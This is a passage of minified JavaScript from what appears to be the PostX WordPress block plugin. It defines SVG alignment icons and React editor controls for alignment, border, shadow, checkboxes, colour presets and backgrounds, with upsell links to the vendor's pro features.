2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 15.75H8.25",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 6.75H8.25",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),center:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6 15.75H12",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M6 6.75H12",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),right:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M2.25 2.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.75 15.75H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M2.25 11.25H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("path",{d:"M9.75 6.75H15.75",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"})),justify:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24"},(0,o.createElement)("path",{clipRule:"evenodd",fillRule:"evenodd",d:"M4 5h16v2H4V5zm0 4v2h16V9H4zm0 4h16v2H4v-2zm16 6H4v-2h16v2z"})),juststart:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M3 16.5L3 1.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"6.00195",y:"14.25",width:"3.75",height:"9",rx:"0.75",transform:"rotate(-90 6.00195 14.25)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"6.00195",y:"7.5",width:"3.75",height:"6",rx:"0.75",transform:"rotate(-90 6.00195 7.5)",stroke:"currentColor",strokeWidth:"1.125"})),justcenter:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M9 1.5L9 16.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"15",y:"3.75",width:"3.75",height:"12",rx:"0.75",transform:"rotate(90 15 3.75)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"12.75",y:"10.5",width:"3.75",height:"7.5",rx:"0.75",transform:"rotate(90 12.75 10.5)",stroke:"currentColor",strokeWidth:"1.125"})),justend:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M15 1.5L15 16.5",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"11.998",y:"3.75",width:"3.75",height:"9",rx:"0.75",transform:"rotate(90 11.998 3.75)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"11.998",y:"10.5",width:"3.75",height:"6",rx:"0.75",transform:"rotate(90 11.998 10.5)",stroke:"currentColor",strokeWidth:"1.125"})),justevenly:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1448.977 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1523.787 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 754.579 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1448.976 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 743.782 129.4105)"}))),justaround:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1260.211 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1335.022 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 662.1925 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1260.211 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 647.4025 129.4105)"}))),justbetween:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",{transform:"translate(-1025.441 -193.46)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1100.253 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 548.308 129.4105)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"6",height:"86.827",rx:"3",transform:"translate(1025.441 193.46)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(180 526.5175 129.4105)"}))),algnStart:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M1.50195 3L16.502 3",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"3.75195",y:"6",width:"3.75",height:"9",rx:"0.75",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"10.502",y:"6",width:"3.75",height:"6",rx:"0.75",stroke:"currentColor",strokeWidth:"1.125"})),algnEnd:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.5 15L1.5 15",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"14.25",y:"12",width:"3.75",height:"9",rx:"0.75",transform:"rotate(-180 14.25 12)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"7.5",y:"12",width:"3.75",height:"6",rx:"0.75",transform:"rotate(-180 7.5 12)",stroke:"currentColor",strokeWidth:"1.125"})),algnCenter:(0,o.createElement)("svg",{viewBox:"0 0 18 18",fill:"none",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{d:"M16.5 9L1.5 9",stroke:"currentColor",strokeWidth:"1.125",strokeLinecap:"round"}),(0,o.createElement)("rect",{x:"14.25",y:"15",width:"3.75",height:"12",rx:"0.75",transform:"rotate(-180 14.25 15)",stroke:"currentColor",strokeWidth:"1.125"}),(0,o.createElement)("rect",{x:"7.5",y:"12.75",width:"3.75",height:"7.5",rx:"0.75",transform:"rotate(-180 7.5 12.75)",stroke:"currentColor",strokeWidth:"1.125"})),stretch:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 80.8 86.8"},(0,o.createElement)("g",null,(0,o.createElement)("g",{transform:"translate(-1022.434 -406.799)"},(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"86.827",height:"6",rx:"3",transform:"translate(1022.434 481.61)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(-90 760.9365 -282.9625)"}),(0,o.createElement)("g",null,(0,o.createElement)("rect",{width:"86.827",height:"6",rx:"3",transform:"translate(1022.434 406.799)"})),(0,o.createElement)("rect",{width:"17.957",height:"43.895",rx:"2.864",transform:"rotate(-90 739.146 -304.753)"})))),flow:(0,o.createElement)("svg",{viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M2.31212 9L1 10.5094L4.77355 13.7897L6.28297 15.1018L7.59509 13.5924L9.13456 11.8214L11.3988 13.7897L12.9082 15.1018L14.2203 13.5924L15.7584 11.823L18.0209 13.7897L19.5303 15.1018L20.8424 13.5924L22.8106 11.3283L21.3012 10.0162L19.333 12.2803L15.5594 9L14.2473 10.5094L14.249 10.5109L12.7109 12.2803L8.93736 9L8.05395 10.0163L6.08567 12.2803L2.31212 9Z"})),left_new:(0,o.createElement)("svg",{viewBox:"0 0 24 24",width:24,height:24,xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3.25 21V3h1.5v18h-1.5ZM8 11.25A1.75 1.75 0 0 1 6.25 9.5V7c0-.966.784-1.75 1.75-1.75h11c.966 0 1.75.784 1.75 1.75v2.5A1.75 1.75 0 0 1 19 11.25H8ZM7.75 9.5c0 .138.112.25.25.25h11a.25.25 0 0 0 .25-.25V7a.25.25 0 0 0-.25-.25H8a.25.25 0 0 0-.25.25v2.5ZM8 18.75A1.75 1.75 0 0 1 6.25 17v-2.5c0-.966.784-1.75 1.75-1.75h6c.966 0 1.75.784 1.75 1.75V17A1.75 1.75 0 0 1 14 18.75H8ZM7.75 17c0 .138.112.25.25.25h6a.25.25 0 0 0 .25-.25v-2.5a.25.25 0 0 0-.25-.25H8a.25.25 0 0 0-.25.25V17Z"})),justbetween_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 21V3h-1.5v18h1.5ZM3.75 21V3h-1.5v18h1.5ZM10.75 8A1.75 1.75 0 0 0 9 6.25H7A1.75 1.75 0 0 0 5.25 8v8c0 .966.784 1.75 1.75 1.75h2A1.75 1.75 0 0 0 10.75 16V8ZM9 7.75a.25.25 0 0 1 .25.25v8a.25.25 0 0 1-.25.25H7a.25.25 0 0 1-.25-.25V8A.25.25 0 0 1 7 7.75h2ZM18.75 8A1.75 1.75 0 0 0 17 6.25h-2A1.75 1.75 0 0 0 13.25 8v8c0 .966.784 1.75 1.75 1.75h2A1.75 1.75 0 0 0 18.75 16V8ZM17 7.75a.25.25 0 0 1 .25.25v8a.25.25 0 0 1-.25.25h-2a.25.25 0 0 1-.25-.25V8a.25.25 0 0 1 .25-.25h2Z"})),center_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M18 5.25h-5.25V3h-1.5v2.25H6A1.75 1.75 0 0 0 4.25 7v2.5c0 .966.784 1.75 1.75 1.75h5.25v1.5H9a1.75 1.75 0 0 0-1.75 1.75V17c0 .966.784 1.75 1.75 1.75h2.25V21h1.5v-2.25H15A1.75 1.75 0 0 0 16.75 17v-2.5A1.75 1.75 0 0 0 15 12.75h-2.25v-1.5H18a1.75 1.75 0 0 0 1.75-1.75V7A1.75 1.75 0 0 0 18 5.25Zm.25 4.25a.25.25 0 0 1-.25.25H6a.25.25 0 0 1-.25-.25V7A.25.25 0 0 1 6 6.75h12a.25.25 0 0 1 .25.25v2.5ZM15 17.25a.25.25 0 0 0 .25-.25v-2.5a.25.25 0 0 0-.25-.25H9a.25.25 0 0 0-.25.25V17c0 .138.112.25.25.25h6Z"})),right_new:(0,o.createElement)("svg",{width:24,height:24,viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M20.75 21V3h-1.5v18h1.5ZM16 11.25a1.75 1.75 0 0 0 1.75-1.75V7A1.75 1.75 0 0 0 16 5.25H5A1.75 1.75 0 0 0 3.25 7v2.5c0 .966.784 1.75 1.75 1.75h11Zm.25-1.75a.25.25 0 0 1-.25.25H5a.25.25 0 0 1-.25-.25V7A.25.25 0 0 1 5 6.75h11a.25.25 0 0 1 .25.25v2.5ZM16 18.75A1.75 1.75 0 0 0 17.75 17v-2.5A1.75 1.75 0 0 0 16 12.75h-6a1.75 1.75 0 0 0-1.75 1.75V17c0 .966.784 1.75 1.75 1.75h6Zm.25-1.75a.25.25 0 0 1-.25.25h-6a.25.25 0 0 1-.25-.25v-2.5a.25.25 0 0 1 .25-.25h6a.25.25 0 0 1 .25.25V17Z"})),alignStretch:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21.75 21V3h-1.5v18h1.5ZM3.75 21V3h-1.5v18h1.5ZM17.5 10.75c.69 0 1.25-.56 1.25-1.25v-3c0-.69-.56-1.25-1.25-1.25h-11c-.69 0-1.25.56-1.25 1.25v3c0 .69.56 1.25 1.25 1.25h11Zm-.25-1.5H6.75v-2.5h10.5v2.5ZM17.5 18.75c.69 0 1.25-.56 1.25-1.25v-3c0-.69-.56-1.25-1.25-1.25h-11c-.69 0-1.25.56-1.25 1.25v3c0 .69.56 1.25 1.25 1.25h11Zm-.25-1.5H6.75v-2.5h10.5v2.5Z"})),alignCenterR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3 11.25h3v1.5H3v-1.5ZM18 11.25h3v1.5h-3v-1.5ZM10.5 11.25h3v1.5h-3v-1.5Z"}),(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M12.75 18c0 .97.78 1.75 1.75 1.75H17c.97 0 1.75-.78 1.75-1.75V6c0-.97-.78-1.75-1.75-1.75h-2.5c-.97 0-1.75.78-1.75 1.75v12Zm1.75.25a.25.25 0 0 1-.25-.25V6c0-.14.11-.25.25-.25H17c.14 0 .25.11.25.25v12c0 .14-.11.25-.25.25h-2.5ZM5.25 15c0 .97.78 1.75 1.75 1.75h2.5c.97 0 1.75-.78 1.75-1.75V9c0-.97-.78-1.75-1.75-1.75H7c-.97 0-1.75.78-1.75 1.75v6Zm1.75.25a.25.25 0 0 1-.25-.25V9c0-.14.11-.25.25-.25h2.5c.14 0 .25.11.25.25v6c0 .14-.11.25-.25.25H7Z"})),alignStartR:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",width:"24",height:"24",viewBox:"0 0 24 24",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M3 3.25h18v1.5H3v-1.5ZM12.75 8c0-.97.78-1.75 1.75-1.75H17c.97 0 1.75.78 1.75 1.75v11c0 .97-.78 1.75-1.75 1.75h-2.5c-.97 0-1.75-.78-1.75-1.75V8Zm1.75-.25a.25.25 0 0 0-.25.25v11c0 .14.11.25.25.25H17c.14 0 .25-.11.25-.25V8a.25.25 0 0 0-.25-.25h-2.5ZM5.25 8c0-.97.78-1.75 1.75-1.75h2.5c.97 0 1.75.78 1.75 1.75v6c0 .97-.78 1.75-1.75 1.75H7c-.97 0-1.75-.78-1.75-1.75V8ZM7 7.75a.25.25 0 0 0-.25.25v6c0 .14.11.25.25.25h2.5c.14 0 .25-.11.25-.25V8a.25.25 0 0 0-.25-.25H7Z",clipRule:"evenodd"})),alignEndR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M3 20.75h18v-1.5H3v1.5ZM12.75 16c0 .97.78 1.75 1.75 1.75H17c.97 0 1.75-.78 1.75-1.75V5c0-.97-.78-1.75-1.75-1.75h-2.5c-.97 0-1.75.78-1.75 1.75v11Zm1.75.25a.25.25 0 0 1-.25-.25V5c0-.14.11-.25.25-.25H17c.14 0 .25.11.25.25v11c0 .14-.11.25-.25.25h-2.5ZM5.25 16c0 .97.78 1.75 1.75 1.75h2.5c.97 0 1.75-.78 1.75-1.75v-6c0-.97-.78-1.75-1.75-1.75H7c-.97 0-1.75.78-1.75 1.75v6Zm1.75.25a.25.25 0 0 1-.25-.25v-6c0-.14.11-.25.25-.25h2.5c.14 0 .25.11.25.25v6c0 .14-.11.25-.25.25H7Z"})),alignStretchR:(0,o.createElement)("svg",{width:"24",height:"24",viewBox:"0 0 24 24",xmlns:"http://www.w3.org/2000/svg",fill:"currentColor"},(0,o.createElement)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M21 2.25H3v1.5h18v-1.5ZM21 20.25H3v1.5h18v-1.5ZM10.75 6.5c0-.69-.56-1.25-1.25-1.25h-3c-.69 0-1.25.56-1.25 1.25v11c0 .69.56 1.25 1.25 1.25h3c.69 0 1.25-.56 1.25-1.25v-11Zm-1.5.25v10.5h-2.5V6.75h2.5ZM18.75 6.5c0-.69-.56-1.25-1.25-1.25h-3c-.69 0-1.25.56-1.25 1.25v11c0 .69.56 1.25 1.25 1.25h3c.69 0 1.25-.56 1.25-1.25v-11Zm-1.5.25v10.5h-2.5V6.75h2.5Z"}))},n=e=>{const{value:t,onChange:l,alignIcons:n,options:r,responsive:s,device:p,label:c,disableJustify:u,toolbar:d,setDevice:m,inline:g}=e,y=r||(u?["left","center","right"]:["left","center","right","justify"]),b=t?s?t[p]||"":t:"",v=n||["left","center","right","justify"];return(0,o.createElement)("div",{className:`ultp-field-wrap ultp-field-alignment ${g?"ultp-align-inline":""} ${d&&"ultp-align-inline"} ${n?.length&&" ultp-row-alignment"}`},(0,o.createElement)("div",{className:"ultp-field-label-responsive"},c&&(0,o.createElement)("label",null,c),s&&(0,o.createElement)(a.Z,{setDevice:m,device:p})),(0,o.createElement)("div",{className:"ultp-sub-field"},y.map(((e,a)=>(0,o.createElement)("span",{tabIndex:0,key:a,onClick:()=>{return o=e,void l(s?Object.assign({},t,{[p]:o}):o);var o},className:`ultp-align-button ${e==b&&"active"}`},i[v[a]],d?"Align text "+e:"")))))}},6766:(e,t,l)=>{"use strict";l.d(t,{Z:()=>p});var o=l(67294),a=l(87763),i=l(64766),n=l(26687),r=l(45009);const{__}=wp.i18n,{Dropdown:s}=wp.components,p=e=>{const{value:t,label:l,onChange:p}=e,c=!(!t||!t.openBorder),u={width:{top:0,right:0,bottom:0,left:0},type:"solid",color:"#555d66"},d=(e,l)=>{p(Object.assign({},u,t,{openBorder:1},{[e]:l}))},m=t&&t.type||"";return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-popup-control ultp-field-border"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)(s,{className:"ultp-range-control",contentClassName:"ultp-field-dropdown-content ultp-border-dropdown-content",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},c&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),d("openBorder",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:`${c&&"active "} ultp-icon-style`,onClick:()=>{t(),d("openBorder",1)},"aria-expanded":e},a.Z.border)),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup"},(0,o.createElement)("div",{className:"ultp-border-style"},["solid","dashed","dotted"].map(((e,t)=>(0,o.createElement)("span",{className:m==e?e+" active":e+" ",key:t,onClick:()=>d("type",e)})))),(0,o.createElement)(r.Z,{min:0,step:1,max:100,label:__("Border Width","ultimate-post"),value:t&&t.width||"",onChange:e=>d("width",e)}),(0,o.createElement)(n.Z,{inline:!0,label:__("Color","ultimate-post"),value:t&&t.color||"",onChange:e=>d("color",e)}))}))}},65641:(e,t,l)=>{"use strict";l.d(t,{Z:()=>u});var o=l(67294),a=l(87763),i=l(64766),n=l(26687),r=l(45009),s=l(60405);const{__}=wp.i18n,{Dropdown:p,ToggleControl:c}=wp.components,u=e=>{const{value:t,label:l,onChange:c}=e,u=!(!t||!t.openShadow),d={inset:"",width:{top:4,right:3,bottom:2,left:1},color:"#555d66"},m=(e,l)=>{c(Object.assign({},d,t,{[e]:l||0}))};return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-popup-control ultp-field-shadow"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content ultp-shadow-dropdown-content",className:"ultp-range-control",renderToggle:({isOpen:e,onToggle:t})=>(0,o.createElement)("div",{className:"ultp-edit-btn"},u&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:()=>{e&&t(),m("openShadow",0)}},i.ZP?.reset_left_line),(0,o.createElement)("div",{className:`${u&&"active "} ultp-icon-style`,onClick:()=>{t(),m("openShadow",1)},"aria-expanded":e},a.Z.boxShadow)),renderContent:()=>(0,o.createElement)("div",{className:"ultp-common-popup"},(0,o.createElement)(r.Z,{label:__("Shadow","ultimate-post"),value:t.width||"",onChange:e=>m("width",e),dataLabel:["offset-x","offset-y","blur","spread"],min:0,max:100,step:1}),(0,o.createElement)(n.Z,{inline:!0,inset:!0,label:__("Color","ultimate-post"),value:t.color||"",onChange:e=>m("color",e)}),(0,o.createElement)(s.Z,{label:__("Inset","ultimate-post"),value:t.inset?1:0,onChange:e=>m("inset",e?"inset":"")}))}))}},53613:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);const a=e=>{const{value:t,label:l,onChange:a,options:i}=e;return(0,o.createElement)("div",{className:"ultp-field-wrap ultp-field-checkbox"},l&&(0,o.createElement)("label",null,l),(0,o.createElement)("div",{className:"ultp-sub-field-checkbox"},i.map(((e,l)=>(0,o.createElement)("div",{key:l},(0,o.createElement)("input",{onClick:()=>(e=>{if(-1!==t.indexOf(e)){const l=t.filter((t=>t!==e));a(l)}else a(t.concat([e]))})(e.value),id:l,type:"checkbox",value:e.value,defaultChecked:-1!=t.indexOf(e.value)}),(0,o.createElement)("label",{htmlFor:l},e.label))))))}},26687:(e,t,l)=>{"use strict";l.d(t,{Z:()=>g});var o=l(67294),a=l(64766),i=l(20107),n=l(60448),r=l(83100);const{__}=wp.i18n,{ColorPicker:s,Dropdown:p,Tooltip:c}=wp.components,{Fragment:u}=wp.element,d=wp.data.select("core/editor"),{useState:m}=wp.element,g=e=>{const{label:t,value:l,onChange:g,disableClear:y,pro:b,inline:v,color2:h,presetSetting:f,value2:k=null,presetClass:w}=e,[x,T]=m(!f&&!("string"!=typeof l||!l?.includes("var(--postx_preset"))),[_,C]=m(0),E=e=>{if(!b||ultp_data.active)if(null!==k){const t=Array(2).fill(void 0);t[_]="string"==typeof e?e:"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")",g(t)}else g("string"==typeof e?e:"rgba("+e.rgb.r+","+e.rgb.g+","+e.rgb.b+","+e.rgb.a+")")},S=()=>{g(null!==k?Array(2).fill(""):"")},P=()=>{const e={theme:d?d.getEditorSettings().colors:[],colors:(0,n.hN)()};return(0,o.createElement)("div",{className:"ultp-preset-color"},e.colors.length>0&&(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-preset-label"},(0,o.createElement)("div",{className:"ultp-field-label"},__("PostX Color","ultimate-post")," "),(0,o.createElement)("div",{className:"ultp-preset-label-link",onClick:()=>(0,n.je)()},(0,o.createElement)("div",{className:"ultp-field-label"},"Customize"),a.ZP?.rightAngle2)),(0,o.createElement)("div",{className:"ultp-preset-color__input"},e.colors.map(((e,t)=>(0,o.createElement)(c,{key:t,placement:"top",text:(0,n.nl)(e,"color")},(0,o.createElement)("a",{className:"color_span "+(l==e?"active":""),key:t,onClick:()=>E(e),style:{backgroundColor:e}})))))),e.theme.length>0&&(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-field-label ultp-theme-preset"},__("Theme Color","ultimate-post")),(0,o.createElement)("div",{className:"ultp-preset-color__input"},e.theme.map(((e,t)=>(0,o.createElement)(c,{key:t,placement:"top",text:e.name},(0,o.createElement)("a",{className:"color_span "+(l==e.color?"active":""),key:t,onClick:()=>E(e.color),style:{backgroundColor:e.color}})))))))},L=()=>(0,o.createElement)("div",{className:"ultp-common-popup ultp-color-popup ultp-color-container "+(x?"active":"")},null!==k&&(0,o.createElement)("div",{style:{textAlign:"center",fontWeight:500,fontSize:"large"}},__(0==_?"Normal Color":"Hover Color","ultimate-post")),!f&&(0,o.createElement)("div",{className:"ultp-color-field-tab"},(0,o.createElement)("div",{className:"ultp-field-label "+(x?"active":""),onClick:()=>T(!0)},"Preset Palette"),(0,o.createElement)("div",{className:"ultp-field-label "+(x?"":"active"),onClick:()=>T(!1)},"Custom")),(0,o.createElement)("div",{className:"ultp-color-field-options"},x?(0,o.createElement)(P,null):(0,o.createElement)(s,{color:(0,n.MR)(l)?l:(0,n.hN)("colorcode",l),onChangeComplete:e=>E(e)})));return f?L():(0,o.createElement)("div",{className:(0,i.Z)({"ultp-field-wrap ultp-field-color":!0,"ultp-color-inline":v,"ultp-preset-color-settings":f,"ultp-color-block":!v,"ultp-pro-field":b&&!ultp_data.active})},t&&!v&&(0,o.createElement)("span",{className:"ultp-color-label"},(0,o.createElement)("label",null,t)),v?h?L():(0,o.createElement)(u,null,(0,o.createElement)("div",{className:"ultp-color-inline__label"},(0,o.createElement)("div",{className:"ultp-color-label__content"},v&&t&&(0,o.createElement)("label",{className:"ultp-color-label"},t),l&&(0,o.createElement)(u,null,(0,o.createElement)("span",{className:"ultp-color-preview",style:{backgroundColor:l}}),null!==k&&(0,o.createElement)("span",{className:"ultp-color-preview",style:{backgroundColor:k,marginLeft:"5px"}}))),(0,o.createElement)("div",{className:"ultp-color-label__content"},!y&&l&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:S},a.ZP?.reset_left_line),(0,o.createElement)(p,{focusOnMount:!0,contentClassName:"ultp-field-dropdown-content",className:"ultp-range-control",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(0)},style:{background:l}}),renderContent:()=>L()}),null!==k&&(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content",focusOnMount:!0,className:"ultp-range-control",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(1)},style:{background:k,marginLeft:"10px"}}),renderContent:()=>L()})))):(0,o.createElement)("div",{className:"ultp-sub-field"},t&&(0,o.createElement)("span",{className:"ultp-color-label"},!y&&l&&(0,o.createElement)("div",{className:"active ultp-base-control-btn ultp-color2-reset-btn",onClick:S},a.ZP?.reset_left_line)),(0,o.createElement)(p,{className:"ultp-range-control",contentClassName:"ultp-field-dropdown-content",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(0)},style:{background:l}}),renderContent:()=>L()}),null!==k&&(0,o.createElement)(p,{contentClassName:"ultp-field-dropdown-content",className:"ultp-range-control",popoverProps:{placement:"bottom-start"},focusOnMount:!0,renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{className:"ultp-control-button",onClick:()=>{e(),C(1)},style:{background:k,marginLeft:"10px"}}),renderContent:()=>L()})),b&&!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id,"#pricing"),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))))}},47484:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(64766),i=l(20107),n=l(60448),r=l(83100),s=l(26687),p=(l(77567),l(21525));l(22217);const{__}=wp.i18n,{Dropdown:c,GradientPicker:u,TextControl:d,ToggleControl:m,SelectControl:g,FocalPointPicker:y,Tooltip:b}=wp.components,{MediaUpload:v}=wp.blockEditor,h=wp.data.select("core/editor"),{useState:f}=wp.element,k=()=>(0,o.createElement)("div",{className:"ultp-field-pro-message"},__("Unlock It! Explore More","ultimate-post")," ",(0,o.createElement)("a",{href:(0,r.Z)("https://www.wpxpo.com/postx/all-features/","blockProFeat",ultp_data.affiliate_id),target:"_blank",rel:"noreferrer"},__("Pro Features","ultimate-post"))),w=e=>{const{value:t,label:l,pro:r,onChange:w,image:x,video:T,extraClass:_,customGradient:C,gbbodyBackground:E,inline:S}=e,P={openColor:0,type:"color",color:"#037fff",gradient:"linear-gradient(90deg, rgb(6, 147, 227) 0%, rgb(155, 81, 224) 100%)",clip:!1},[L,I]=f(!("string"!=typeof t.gradient||!t.gradient?.includes("var(--postx_preset"))),B=(0,n._n)();let U=(0,n.MR)(t.gradient)?t.gradient:(0,n._n)("colorcode",t.gradient);"string"==typeof U&&(U?.includes("postx_preset_Primary_color")||U.includes("postx_preset_Secondary_color"))&&(U=U.replace("var(--postx_preset_Primary_color)",(0,n.hN)("colorcode","var(--postx_preset_Primary_color)")).replace("var(--postx_preset_Secondary_color)",(0,n.hN)("colorcode","var(--postx_preset_Secondary_color)")));const M=(e,l)=>{if(r&&!ultp_data.active)return;const o=t;"object"==typeof 